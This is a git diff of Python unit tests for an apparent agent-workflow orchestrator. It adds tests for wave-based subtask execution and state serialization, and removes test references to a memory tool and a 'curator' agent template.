"""Tests for advance_wave command.""" + + def test_increments_wave_index(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + result = map_orchestrator.advance_wave(branch_dir) + assert result["status"] == "success" + assert result["current_wave_index"] == 1 + assert result["is_complete"] is False + + def test_is_complete_after_last_wave(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + map_orchestrator.advance_wave(branch_dir) # wave 1 + map_orchestrator.advance_wave(branch_dir) # wave 2 + result = map_orchestrator.advance_wave(branch_dir) # wave 3 (past end) + assert result["is_complete"] is True + + def test_resets_subtask_phases(self, branch_dir, sample_blueprint): + map_orchestrator.set_waves(branch_dir, sample_blueprint) + # Set some phases + state_file = Path(f".map/{branch_dir}/step_state.json") + state = map_orchestrator.StepState.load(state_file) + state.subtask_phases = {"ST-001": "2.4"} + state.save(state_file) + # Advance wave + map_orchestrator.advance_wave(branch_dir) + state = map_orchestrator.StepState.load(state_file) + assert state.subtask_phases == {} + + def test_no_waves_returns_error(self, branch_dir): + state = map_orchestrator.StepState() + state.save(Path(f".map/{branch_dir}/step_state.json")) + result = map_orchestrator.advance_wave(branch_dir) + assert result["status"] == "error" + + +class TestBackwardCompat: + """Verify get_next_step works when execution_waves is empty.""" + + def test_get_next_step_without_waves(self, branch_dir): + """Standard sequential flow works when no waves are configured.""" + state = map_orchestrator.StepState() + state.save(Path(f".map/{branch_dir}/step_state.json")) + result = map_orchestrator.get_next_step(branch_dir) + assert result["step_id"] == "1.0" + assert result["phase"] == "DECOMPOSE" + assert result["is_complete"] is False + + def test_state_serialization_with_wave_fields(self, branch_dir): + """State with wave fields serializes and deserializes correctly.""" + state = map_orchestrator.StepState() + state.execution_waves = [["ST-001"], ["ST-002", "ST-003"]] + state.current_wave_index = 1 + state.subtask_phases = {"ST-002": "2.3"} + state.subtask_retry_counts = {"ST-002": 1} + + state_file = Path(f".map/{branch_dir}/step_state.json") + state.save(state_file) + + loaded = map_orchestrator.StepState.load(state_file) + assert loaded.execution_waves == [["ST-001"], ["ST-002", "ST-003"]] + assert loaded.current_wave_index == 1 + assert loaded.subtask_phases == {"ST-002": "2.3"} + assert loaded.subtask_retry_counts == {"ST-002": 1} + + def test_old_state_file_loads_with_defaults(self, branch_dir): + """State file without wave fields loads with sensible defaults.""" + old_state = { + "workflow": "map-efficient", + "current_step_id": "2.0", + "current_step_phase": "XML_PACKET", + "subtask_sequence": ["ST-001"], + # No wave fields + } + state_file = Path(f".map/{branch_dir}/step_state.json") + state_file.write_text(json.dumps(old_state), encoding="utf-8") + + loaded = map_orchestrator.StepState.load(state_file) + assert loaded.execution_waves == [] + assert loaded.current_wave_index == 0 + assert loaded.subtask_phases == {} + assert loaded.subtask_retry_counts == {} + + +if __name__ == "__main__": + pytest.main([__file__, "-v"]) diff --git a/tests/test_mapify_cli.py b/tests/test_mapify_cli.py index a1c72ff..405cf33 100644 --- a/tests/test_mapify_cli.py +++ b/tests/test_mapify_cli.py @@ -188,7 +188,6 @@ def test_init_basic(self, tmp_path): assert "Bash(go test *)" in allow assert "Bash(go vet *)" in allow assert "Bash(go mod tidy *)" in allow - assert "mcp__mem0__*" in allow assert "mcp__sourcecraft__list_pull_request_comments" in allow assert "Bash(make generate manifests)" in allow assert "Bash(make manifests)" in allow @@ -613,7 +612,6 @@ def test_create_agent_files_fallback(self, mock_get_templates, tmp_path): "predictor.md", "evaluator.md", "reflector.md", - "curator.md", "documentation-reviewer.md", ] diff --git a/tests/test_template_sync.py b/tests/test_template_sync.py index a5205fa..ecfd315 100644 --- a/tests/test_template_sync.py +++ b/tests/test_template_sync.py @@ -37,10 +37,9 @@ def templates_agents_dir(self, project_root): @pytest.fixture def expected_agents(self): - """List of expected agent template files (all 12 agents).""" + """List of expected agent template files (all 11 agents).""" return [ "actor.md", - "curator.md", "debate-arbiter.md", "documentation-reviewer.md", "evaluator.md", @@ -116,7 +115,6 @@ def test_no_missing_files_in_templates( "monitor.md", "predictor.md", "evaluator.md", - "curator.md", "reflector.md", "task-decomposer.md", "documentation-reviewer.md", diff --git a/tests/test_workflow_gate.py b/tests/test_workflow_gate.py index 5a2027f..370aeba 100644 --- a/tests/test_workflow_gate.py +++ b/tests/test_workflow_gate.py @@ -175,7 +175,6 @@ def test_blocks_edit_without_actor(self, tmp_path: Path) -> None: "completed_steps": { "ST-001": [ "xml_packet", - "mem0_search", ] # Missing actor and monitor }, "pending_steps": { @@ -211,7 +210,6 @@ def test_blocks_edit_without_monitor(self, tmp_path: Path) -> None: "completed_steps": { "ST-001": [ "xml_packet", - "mem0_search", "actor", ] # Missing monitor }, @@ -243,7 +241,7 @@ def test_allows_edit_after_actor_and_monitor(self, tmp_path: Path) -> None: "workflow": "map-efficient", "current_subtask": "ST-001", "completed_steps": { - "ST-001": ["xml_packet", "mem0_search", "actor", "monitor"] + "ST-001": ["xml_packet", "actor", "monitor"] }, "pending_steps": {"ST-001": ["tests", "linter"]}, }